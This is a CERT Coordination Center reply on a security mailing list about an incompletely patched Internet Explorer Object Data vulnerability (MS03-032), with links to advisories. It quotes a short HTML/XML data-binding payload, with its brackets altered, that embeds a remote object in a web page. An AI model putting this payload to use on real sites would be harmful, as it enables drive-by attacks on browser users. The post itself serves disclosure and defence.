-----BEGIN PGP SIGNED MESSAGE----- Thor Larholm <thor@pivx.com> writes: > This is just a simple exploit utilizing the Object Data vulnerability > discovered by Drew Copley, coupled with the GreyMagic no-script HTML > rendering as demonstrated earlier on this list and others by jelmer. > > Tell your user to go install MS03-032, which he obviously did not do as > MS03-032 patches this vulnerability. MS03-032 was released on August 20 > and you can find it at > > http://www.microsoft.com/technet/security/bulletin/MS03-032.asp At the present, the patch for MS03-032 breaks one of at least three exploit techniques. The patch does not resolve the vulnerability. MS03-032 acknowledges this. I have seen several examples of this vulnerability being exploited in the wild. > www.haxr.org contains the following HTML code (with <> replaced to []): > > [span datasrc="#oExec" datafld="counter" dataformatas="html"][/span] > [xml id="oExec"] > [security] > [counter] > [![CDATA[ > [object data=tracker.php][/object] > ]]] > [/counter] > [/security] > [/xml] In particular, the current MS03-32 patch doesn't account for an HTML document created via XML/data binding: <http://greymagic.com/adv/gm001-ie/> The patch also does not account for an HTML document created via script: <http://www.securityfocus.com/archive/1/336616> Vulnerability Note VU#865940: <http://www.kb.cert.org/vuls/id/865940> Regards, - Art Art Manion -- CERT Coordination Center <http://www.cert.org/> <cert@cert.org> +1 412-268-7090 E0 1E DF F5 FC 76 00 32 77 8F 25 F7 B0 2E 2C 27 -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBP3HlHDpmH2w9K/0VAQGBuQQAmrvGlHEXmMx48LhA2dQ/wK8XCqYaVYtD Y4FPmSvwqZ8phYKhT20Dh9sYGLWHbaJ3sfGA589MOLJwhpZ3aVlunLQ6GjLO1qje 6dab5rVGdgTNzMC87YX2E7RB6uS4K8htL0MhN4LLvbHS402QEeNOhX+Fi2lsLkyi 6uioMggI1Ms= =Jnmk -----END PGP SIGNATURE-----
